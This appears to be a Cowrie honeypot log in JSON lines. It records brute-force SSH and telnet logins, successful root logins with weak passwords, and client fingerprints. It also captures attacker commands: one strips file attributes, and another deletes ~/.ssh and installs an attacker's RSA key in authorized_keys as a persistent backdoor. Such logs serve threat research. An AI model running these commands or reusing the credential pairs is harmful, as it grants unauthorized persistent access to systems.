{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T03:50:57.237533Z","src_ip":"103.217.145.104","session":"79f3094bb8d0"}
{"eventid":"cowrie.session.closed","duration":"9.1","message":"Connection lost after 9.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:50:57.497216Z","src_ip":"103.217.145.104","session":"37e2ea3f7742"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:50:57.500221Z","src_ip":"103.217.145.104","session":"79f3094bb8d0"}
{"eventid":"cowrie.session.closed","duration":14.340025186538696,"message":"Connection lost after 14 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:50:58.664443Z","src_ip":"212.227.235.229","session":"5c8ccd66ce9e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43882,"dst_ip":"1.2.3.4","dst_port":23,"session":"0a612dea765f","protocol":"telnet","message":"New connection: 212.227.235.229:43882 (1.2.3.4:23) [session: 0a612dea765f]","sensor":"my-vps","timestamp":"2025-08-26T03:51:00.934817Z"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":56364,"dst_ip":"1.2.3.4","dst_port":22,"session":"67033252f70e","protocol":"ssh","message":"New connection: 217.72.205.35:56364 (1.2.3.4:22) [session: 67033252f70e]","sensor":"my-vps","timestamp":"2025-08-26T03:51:12.003659Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:51:12.005574Z","src_ip":"217.72.205.35","session":"67033252f70e"}
{"eventid":"cowrie.session.closed","duration":14.819432020187378,"message":"Connection lost after 14 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:51:15.754143Z","src_ip":"212.227.235.229","session":"0a612dea765f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44173,"dst_ip":"1.2.3.4","dst_port":23,"session":"078655eb74d5","protocol":"telnet","message":"New connection: 212.227.235.229:44173 (1.2.3.4:23) [session: 078655eb74d5]","sensor":"my-vps","timestamp":"2025-08-26T03:51:16.052591Z"}
{"eventid":"cowrie.session.connect","src_ip":"68.183.87.241","src_port":36882,"dst_ip":"1.2.3.4","dst_port":22,"session":"5116ab0b9f79","protocol":"ssh","message":"New connection: 68.183.87.241:36882 (1.2.3.4:22) [session: 5116ab0b9f79]","sensor":"my-vps","timestamp":"2025-08-26T03:51:19.773630Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T03:51:19.774472Z","src_ip":"68.183.87.241","session":"5116ab0b9f79"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T03:51:20.063153Z","src_ip":"68.183.87.241","session":"5116ab0b9f79"}
{"eventid":"cowrie.login.failed","username":"teste","password":"teste","message":"login attempt [teste/teste] failed","sensor":"my-vps","timestamp":"2025-08-26T03:51:21.252093Z","src_ip":"68.183.87.241","session":"5116ab0b9f79"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:51:22.543930Z","src_ip":"68.183.87.241","session":"5116ab0b9f79"}
{"eventid":"cowrie.session.closed","duration":14.55088472366333,"message":"Connection lost after 14 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:51:30.603398Z","src_ip":"212.227.235.229","session":"078655eb74d5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44393,"dst_ip":"1.2.3.4","dst_port":23,"session":"4ae5e9eebcf5","protocol":"telnet","message":"New connection: 212.227.235.229:44393 (1.2.3.4:23) [session: 4ae5e9eebcf5]","sensor":"my-vps","timestamp":"2025-08-26T03:51:31.812525Z"}
{"eventid":"cowrie.session.closed","duration":13.74854850769043,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:51:45.560968Z","src_ip":"212.227.235.229","session":"4ae5e9eebcf5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44690,"dst_ip":"1.2.3.4","dst_port":23,"session":"faa61741ed33","protocol":"telnet","message":"New connection: 212.227.235.229:44690 (1.2.3.4:23) [session: faa61741ed33]","sensor":"my-vps","timestamp":"2025-08-26T03:51:47.850984Z"}
{"eventid":"cowrie.session.closed","duration":13.568275928497314,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:52:01.419168Z","src_ip":"212.227.235.229","session":"faa61741ed33"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44894,"dst_ip":"1.2.3.4","dst_port":23,"session":"afce3b98d730","protocol":"telnet","message":"New connection: 212.227.235.229:44894 (1.2.3.4:23) [session: afce3b98d730]","sensor":"my-vps","timestamp":"2025-08-26T03:52:03.720545Z"}
{"eventid":"cowrie.session.connect","src_ip":"103.217.145.104","src_port":55172,"dst_ip":"1.2.3.4","dst_port":22,"session":"48947cacc28f","protocol":"ssh","message":"New connection: 103.217.145.104:55172 (1.2.3.4:22) [session: 48947cacc28f]","sensor":"my-vps","timestamp":"2025-08-26T03:52:11.695475Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T03:52:11.696314Z","src_ip":"103.217.145.104","session":"48947cacc28f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T03:52:11.956293Z","src_ip":"103.217.145.104","session":"48947cacc28f"}
{"eventid":"cowrie.login.success","username":"root","password":"Xu@123456","message":"login attempt [root/Xu@123456] succeeded","sensor":"my-vps","timestamp":"2025-08-26T03:52:12.997081Z","src_ip":"103.217.145.104","session":"48947cacc28f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T03:52:13.564786Z","src_ip":"103.217.145.104","session":"48947cacc28f"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T03:52:13.565465Z","src_ip":"103.217.145.104","session":"48947cacc28f"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T03:52:13.567286Z","src_ip":"103.217.145.104","session":"48947cacc28f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:52:13.829121Z","src_ip":"103.217.145.104","session":"48947cacc28f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T03:52:14.405015Z","src_ip":"103.217.145.104","session":"48947cacc28f"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T03:52:14.405689Z","src_ip":"103.217.145.104","session":"48947cacc28f"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T03:52:14.704078Z","src_ip":"103.217.145.104","session":"48947cacc28f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:52:14.705053Z","src_ip":"103.217.145.104","session":"48947cacc28f"}
{"eventid":"cowrie.session.connect","src_ip":"103.217.145.104","src_port":55184,"dst_ip":"1.2.3.4","dst_port":22,"session":"487d4b3c2d61","protocol":"ssh","message":"New connection: 103.217.145.104:55184 (1.2.3.4:22) [session: 487d4b3c2d61]","sensor":"my-vps","timestamp":"2025-08-26T03:52:14.968110Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T03:52:14.969049Z","src_ip":"103.217.145.104","session":"487d4b3c2d61"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T03:52:15.237821Z","src_ip":"103.217.145.104","session":"487d4b3c2d61"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T03:52:16.361115Z","src_ip":"103.217.145.104","session":"487d4b3c2d61"}
{"eventid":"cowrie.session.closed","duration":13.582797765731812,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:52:17.303269Z","src_ip":"212.227.235.229","session":"afce3b98d730"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:52:17.630591Z","src_ip":"103.217.145.104","session":"487d4b3c2d61"}
{"eventid":"cowrie.session.connect","src_ip":"103.217.145.104","src_port":55186,"dst_ip":"1.2.3.4","dst_port":22,"session":"17fb1676ff1f","protocol":"ssh","message":"New connection: 103.217.145.104:55186 (1.2.3.4:22) [session: 17fb1676ff1f]","sensor":"my-vps","timestamp":"2025-08-26T03:52:18.052487Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T03:52:18.083710Z","src_ip":"103.217.145.104","session":"17fb1676ff1f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T03:52:18.351202Z","src_ip":"103.217.145.104","session":"17fb1676ff1f"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.112","src_port":52604,"dst_ip":"1.2.3.4","dst_port":22,"session":"c4a58c77d790","protocol":"ssh","message":"New connection: 80.94.95.112:52604 (1.2.3.4:22) [session: c4a58c77d790]","sensor":"my-vps","timestamp":"2025-08-26T03:52:18.559679Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-26T03:52:18.560527Z","src_ip":"80.94.95.112","session":"c4a58c77d790"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-26T03:52:18.590809Z","src_ip":"80.94.95.112","session":"c4a58c77d790"}
{"eventid":"cowrie.login.failed","username":"admin","password":"tomboy","message":"login attempt [admin/tomboy] failed","sensor":"my-vps","timestamp":"2025-08-26T03:52:18.790456Z","src_ip":"80.94.95.112","session":"c4a58c77d790"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T03:52:19.415401Z","src_ip":"103.217.145.104","session":"17fb1676ff1f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45207,"dst_ip":"1.2.3.4","dst_port":23,"session":"89882625453a","protocol":"telnet","message":"New connection: 212.227.235.229:45207 (1.2.3.4:23) [session: 89882625453a]","sensor":"my-vps","timestamp":"2025-08-26T03:52:19.592822Z"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:52:19.680899Z","src_ip":"103.217.145.104","session":"48947cacc28f"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:52:19.683127Z","src_ip":"103.217.145.104","session":"17fb1676ff1f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36572,"dst_ip":"1.2.3.4","dst_port":22,"session":"95b1d22ee51f","protocol":"ssh","message":"New connection: 212.227.235.229:36572 (1.2.3.4:22) [session: 95b1d22ee51f]","sensor":"my-vps","timestamp":"2025-08-26T03:52:19.782219Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T03:52:19.782878Z","src_ip":"212.227.235.229","session":"95b1d22ee51f"}
{"eventid":"cowrie.login.failed","username":"admin","password":"tom123","message":"login attempt [admin/tom123] failed","sensor":"my-vps","timestamp":"2025-08-26T03:52:19.821316Z","src_ip":"80.94.95.112","session":"c4a58c77d790"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T03:52:20.041953Z","src_ip":"212.227.235.229","session":"95b1d22ee51f"}
{"eventid":"cowrie.login.failed","username":"admin","password":"theshit","message":"login attempt [admin/theshit] failed","sensor":"my-vps","timestamp":"2025-08-26T03:52:20.854323Z","src_ip":"80.94.95.112","session":"c4a58c77d790"}
{"eventid":"cowrie.login.success","username":"root","password":"King1234","message":"login attempt [root/King1234] succeeded","sensor":"my-vps","timestamp":"2025-08-26T03:52:21.118287Z","src_ip":"212.227.235.229","session":"95b1d22ee51f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T03:52:21.656805Z","src_ip":"212.227.235.229","session":"95b1d22ee51f"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T03:52:21.659112Z","src_ip":"212.227.235.229","session":"95b1d22ee51f"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T03:52:21.661398Z","src_ip":"212.227.235.229","session":"95b1d22ee51f"}
{"eventid":"cowrie.login.failed","username":"admin","password":"theclash","message":"login attempt [admin/theclash] failed","sensor":"my-vps","timestamp":"2025-08-26T03:52:21.885730Z","src_ip":"80.94.95.112","session":"c4a58c77d790"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:52:21.923967Z","src_ip":"212.227.235.229","session":"95b1d22ee51f"}
{"eventid":"cowrie.login.failed","username":"admin","password":"terri","message":"login attempt [admin/terri] failed","sensor":"my-vps","timestamp":"2025-08-26T03:52:22.918749Z","src_ip":"80.94.95.112","session":"c4a58c77d790"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T03:52:23.056328Z","src_ip":"212.227.235.229","session":"95b1d22ee51f"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T03:52:23.056989Z","src_ip":"212.227.235.229","session":"95b1d22ee51f"}
